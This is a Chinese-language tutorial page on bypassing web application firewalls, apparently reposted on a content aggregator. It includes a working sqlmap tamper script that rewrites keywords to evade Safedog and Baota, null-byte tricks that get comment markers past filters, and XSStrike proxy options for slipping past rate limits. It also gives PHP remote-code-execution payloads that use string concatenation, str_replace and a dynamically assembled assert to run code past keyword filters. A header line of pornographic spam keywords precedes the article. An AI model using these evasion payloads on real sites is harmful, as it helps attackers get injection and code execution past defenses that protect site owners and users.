国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

這篇具有很好參考價值的文章主要介紹了03-WAF繞過-漏洞利用之注入上傳跨站等繞過。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

WAF繞過-漏洞利用之注入上傳跨站等繞過

思維導(dǎo)圖

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

一、sql注入繞過

使用sqlmap注入測試?yán)@過

1.繞過cc流量

通過sqlmap對網(wǎng)站進(jìn)行測試的時候,如果對方有cc流量防護(hù),需要給sqlmap設(shè)置一個代理進(jìn)行注入。

  • 防cc攔截:修改user-agent頭+代理(付費代理池)

修改user-agent頭:

? (1)加參數(shù):–random-agent

  • 使用隨機user-agent進(jìn)行測試。sqlmap有一個文件中儲存了各種各樣的user-agent,文件在sqlmap/txt/user-agent.txt 在level>=3時會檢測user-agent注入。

? (2)直接加上頭部加參數(shù):–user-agent=“Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

  • 指定一個user-agent的值進(jìn)行測試。

    • 默認(rèn)情況下,sqlmap會使用自己的user-agent進(jìn)行測試(所以很多服務(wù)器發(fā)現(xiàn)user-agent是sqlmap的數(shù)據(jù)包直接認(rèn)為是入侵),sqlmap自己的user-agent是:sqlmap/1.0-dev-nongit-201603020a89(http://sqlmap.org)

    (3)修改配置文件sqlmap.conf中的agent變量值

    ? 加代理:–proxy=“http:tps123.kdlapi.com:15818”

    這里的代理為自己購買的。

2.繞過關(guān)鍵字

替換關(guān)鍵字為加密

編寫的waf-dog.py:python腳本如下

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""


from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload,**kwargs):
    retVal =""
    if payload:
        payload = payload.replace("union","%23a%0aunion")
        payload = payload.replace("select","/*!4457select*/")
        payload = payload.replace("%20","%23a%0a")
        payload = payload.replace(" ","%23a%0a")
        payload = payload.replace("database()","database%23a%0a()")
    return payload


//替換了關(guān)鍵字

3.注釋攔截繞過

在買了寶塔付費產(chǎn)品后,過狗的payload中含有/*的都會被寶塔攔截。(寶塔比安全狗多了一個對/*進(jìn)行檢測),

因此同樣用編寫后繞過安全狗的tampe模塊去跑網(wǎng)站,雖然繞過了安全狗,如果對方有寶塔,會被寶塔攔截。

方法:一但用到/*這些注釋什么的,就在前面加上%00,寶塔就以為結(jié)束了,不會檢測后面的數(shù)據(jù)了。

修改腳本,在使用/*的時候在前面加上%00

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

語句示范:

sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent


`--tamper=TAMPER` 使用sqlmap自帶的tamper,或者自己寫的tamper,來混淆payload,通常用來繞過waf和ips。

另外,抓包查看sqlmap的指紋如下,會被waf攔截,所以需要修改us頭。

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

二、文件上傳

更改上傳后綴名的格式

1.php 截斷,參考之前學(xué)習(xí)的payload上傳,繞過waf

和前面文件上傳專題的繞過方法一樣。

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

三、XSS繞過WAF

利用 XSStrike工具進(jìn)行測試
此時如果對方網(wǎng)站開啟cc防護(hù):
1.由于是工具,需要設(shè)置一個代理
2.設(shè)置延遲參數(shù)

即:利用xss trike繞過,加上–timeout或者–proxy繞過cc

xsstrike.py -u "目標(biāo)網(wǎng)址" --timeout x  延時
xsstrike.py -u "目標(biāo)網(wǎng)址" --proxy  代理地址

XSStrike參數(shù):

-h, --help //顯示幫助信息
-u, --url //指定目標(biāo) URL
--data //POST 方式提交內(nèi)容
-v, --verbose //詳細(xì)輸出
-f, --file //加載自定義 paload 字典
-t, --threads //定義線程數(shù)
-l, --level //爬行深度
-t, --encode //定義 payload 編碼方式
--json //將 POST 數(shù)據(jù)視為 JSON
--path //測試 URL 路徑組件
--seeds //從文件中測試、抓取 URL
--fuzzer //測試過濾器和 Web 應(yīng)用程序防火墻。
--update //更新
--timeout //設(shè)置超時時間
--params //指定參數(shù)
--crawl //爬行
--proxy //使用代理
--blind //盲測試
--skip //跳過確認(rèn)提示
--skip-dom //跳過 DOM 掃描
--headers //提供 HTTP 標(biāo)頭
-d, --delay //設(shè)置延遲

四、RCE執(zhí)行繞過

加密編碼繞過?算法可逆?關(guān)鍵字繞過?提交方法?各種測試?

實例:目標(biāo)pikachu靶場rce漏洞

1.RCE源代碼:
接收post傳入的參數(shù),并且通過eval執(zhí)行,如果沒執(zhí)行成功則輸出字符串

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

1.輸入echo 123; 并執(zhí)行,成功輸出

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

2.但是當(dāng)輸入phpinfo();時,連接被重置了,此處是因為敏感字符被waf檢測到了所以進(jìn)行攔截

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

攔截日志,觸發(fā)了phpinfo()

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

4.此時我們想到通過base64加密解密來繞過phpinfo(); 這個關(guān)鍵字

先把phpinfo();用base64加密,結(jié)果為cGhwaW5mbygpOw==,然后用php中的base64解密函數(shù)base64_decode()進(jìn)行解密

所以在輸入框內(nèi)base64_decode(‘cGhwaW5mbygpOw==’);提交即可

當(dāng)post將字符串base64_decode(‘cGhwaW5mbygpOw==’);提交后,對方后臺接收到post值,并通過eval將字符串當(dāng)成php代碼執(zhí)行,就成功對加密后的phpinfo();進(jìn)行了解密還原。(此時感覺邏輯非常的通順)

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

5.提交后發(fā)現(xiàn)又被攔截了,此時我們打開寶塔的日志看了一眼,又被匹配到了敏感參數(shù),這次是base64_decode()(我感覺就算沒有攔截的話,通過上面源碼看,傳入后也執(zhí)行不了,會報語法錯誤)

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

6.此時就可以用字符串的拼接來繞過waf對關(guān)鍵字的匹配

(1) 因為waf只是攔截關(guān)鍵字,我們用字符串將關(guān)鍵字拼接起來,waf就不會識別到,并且可以執(zhí)行同樣的功能

例子:
$a='php'.'info();';assert($a);
將php和info(); 拼接起來賦值給變量a,再通過assert對執(zhí)行變量a

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

提交后

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

(2) 或者用php中的str_replace函數(shù)替換變量中指定的字符串為空

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);

(3) 上面的方法都有用到assert來執(zhí)行phpinfo(); 如果assert也被過濾了呢
此時我們也可以用拼接字符串或者str_replace拆分來繞過關(guān)鍵字

$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','pxhpxinxfo()');$xxx($y)

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

使用assert還有一點

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

不使用沒有顯示是因為phpinfo()沒有被執(zhí)行,因此加個assert()函數(shù)

03-WAF繞過-漏洞利用之注入上傳跨站等繞過

也可以通過$_REQUEST提交方式繞過

完整語句:

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

五、文件包含

以下幾種:…\ …/ …\等文章來源地址http://www.zghlxwxcb.cn/news/detail-431142.html

到了這里,關(guān)于03-WAF繞過-漏洞利用之注入上傳跨站等繞過的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • xss跨站之waf繞過及安全修復(fù)(28)

    xss跨站之waf繞過及安全修復(fù)(28)

    手工探針xss繞過waf規(guī)則 打開靶場? 寫入跨站測試語句發(fā)現(xiàn)攔截 ?這里就做一個最經(jīng)典的方法,做一個拆分來確立攔截的是什么東西。 去掉最后字符串,訪問還是攔截,再去掉alert(1),訪問還是攔截,再去掉尖括號里面一個字符。留下scrtp在訪問一下,還是攔截了,拿

    2024年02月13日
    瀏覽(32)
  • 實戰(zhàn)繞過WTS-WAF的SQL注入

    實戰(zhàn)繞過WTS-WAF的SQL注入

    ??本人在做完測試了,所保留的信息均已刪除且未保留,只是友好的測試,并非有意為之。若侵權(quán)請聯(lián)系我進(jìn)行刪帖。 ??這里發(fā)現(xiàn)漏洞也是通過URL來進(jìn)行判斷的,發(fā)現(xiàn)存在?id=22,那么就激情我的測試的興趣了,但是and 1=2–+上來就給我干出了WAF,然后這里就需要考慮如何

    2024年02月08日
    瀏覽(57)
  • SQL注入三連實戰(zhàn)繞過WTS-WAF

    SQL注入三連實戰(zhàn)繞過WTS-WAF

    一鍵三連,sql注入 一次無意之間發(fā)現(xiàn)的sql注入,主要是因為有一個WTS-WAF,在此記錄一下 只是友好測試,并非有意為之。。。。 判斷字段數(shù) 測試到order by 15的時候出現(xiàn)了報錯,那么就可以說明字段數(shù)為14 直接注入 聯(lián)合注入直接上 很多都可以,我這里直接用第二個位置 這里以

    2024年02月07日
    瀏覽(20)
  • 從SQL注入繞過最新安全狗WAF中學(xué)習(xí)fuzz

    從SQL注入繞過最新安全狗WAF中學(xué)習(xí)fuzz

    SQL注入并不是很精通,通過實戰(zhàn)繞過WAF來進(jìn)行加強SQL注入能力,希望對正在學(xué)習(xí)的師傅能有一絲幫助。 我是本地搭建的環(huán)境進(jìn)行測試的 環(huán)境是 windows11+phpstudy2018+sqli-labs phpstudy的安裝我不再復(fù)述,這里簡單說一下安全狗插件和安全狗的安裝。 在安裝安全狗之前,一定要先做好

    2024年02月14日
    瀏覽(23)
  • 【XSS漏洞03】XSS漏洞驗證、語句構(gòu)造與繞過方法

    【XSS漏洞03】XSS漏洞驗證、語句構(gòu)造與繞過方法

    常見概念 POC:全稱 ’ Proof of Concept \\\',中文 ’ 概念驗證 ’ ,常指一段漏洞證明的代碼。 EXP:全稱 ’ Exploit \\\',中文 ’ 利用 \\\',指利用系統(tǒng)漏洞進(jìn)行攻擊的動作。 Payload:中文 ’ 有效載荷 \\\',指成功exploit之后,真正在目標(biāo)系統(tǒng)執(zhí)行的代碼或指令。 Shellcode:簡單翻譯 ’ she

    2024年02月05日
    瀏覽(20)
  • 文件上傳漏洞基礎(chǔ)/::$DATA繞過上傳/疊加特征繞過/雙寫繞過

    文件上傳漏洞基礎(chǔ)/::$DATA繞過上傳/疊加特征繞過/雙寫繞過

    如果后綴名沒有對::$DATA進(jìn)行判斷,利用windows系統(tǒng)NTFS特征可以繞過上傳 在window的時候如果文件名+\\\"::$DATA\\\"會把::$DATA之后的數(shù)據(jù)當(dāng)成文件流處理,不會檢測后綴名,且保持::$DATA之前的文件名,其實和空格繞過點繞過類似 upload-pass08 代碼分析 看到這里還是黑名單過濾,比前面少了

    2024年02月06日
    瀏覽(11)
  • 文件上傳漏洞基礎(chǔ)/htaccess重寫解析繞過/大小寫繞過上傳/windows特性繞過

    文件上傳漏洞基礎(chǔ)/htaccess重寫解析繞過/大小寫繞過上傳/windows特性繞過

    目錄 一、htaccess重寫解析繞過上傳 htaccess文件 htaccess文件上傳 靶場練習(xí)pass-04 代碼分析 創(chuàng)建.htaccess文件 開始上傳 訪問 二、大小寫繞過 upload-labs pass-05 代碼分析 上傳 訪問 ?編輯? 三、空格繞過上傳 pass-06 代碼分析 嘗試上傳 訪問 四、利用windows系統(tǒng)特征繞過上傳 pass-07 代碼

    2024年02月13日
    瀏覽(18)
  • 文件上傳漏洞(1), 文件上傳繞過原理

    一, 前端校驗上傳文件 添加 Javascript 代碼,然后在 form 表單中 添加 onsubmit=\\\"returb checkFile()\\\" 繞過前端: 1. 在瀏覽器設(shè)置中禁用js 通常不建議使用這種方式, 因為前端js中可能存在很多其他js的功能, 例如ajax請求. 2. 用burpsuite等工具修改請求. 因為前端js對文件類型做了限制, 那么將

    2024年02月08日
    瀏覽(18)
  • iwebsec靶場 SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過

    iwebsec靶場 SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過

    iwebsec靶場 SQL注入漏洞通關(guān)筆記1- 數(shù)字型注入_mooyuan的博客-CSDN博客 iwebsec靶場 SQL注入漏洞通關(guān)筆記2- 字符型注入(寬字節(jié)注入)_mooyuan的博客-CSDN博客 iwebsec靶場 SQL注入漏洞通關(guān)筆記3- bool注入(布爾型盲注)_mooyuan的博客-CSDN博客 iwebsec靶場 SQL注入漏洞通關(guān)筆記4- sleep注入(時

    2023年04月24日
    瀏覽(16)
  • 【文件上傳漏洞繞過方式】

    【文件上傳漏洞繞過方式】

    目錄 前言 正文 總結(jié) ? 目前,文件上傳往往在業(yè)務(wù)中不可避免,也是極其容易出現(xiàn)上傳漏洞。根據(jù)owasptop10中的排名,文件上傳漏洞(屬于攻擊檢測和防范不足)高居其中。今天和大家分享常見的文件上傳的繞過方式。 ?繞過方式一:前端繞過 ?首先,根據(jù)前端頁面隊上傳文

    2023年04月08日
    瀏覽(15)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包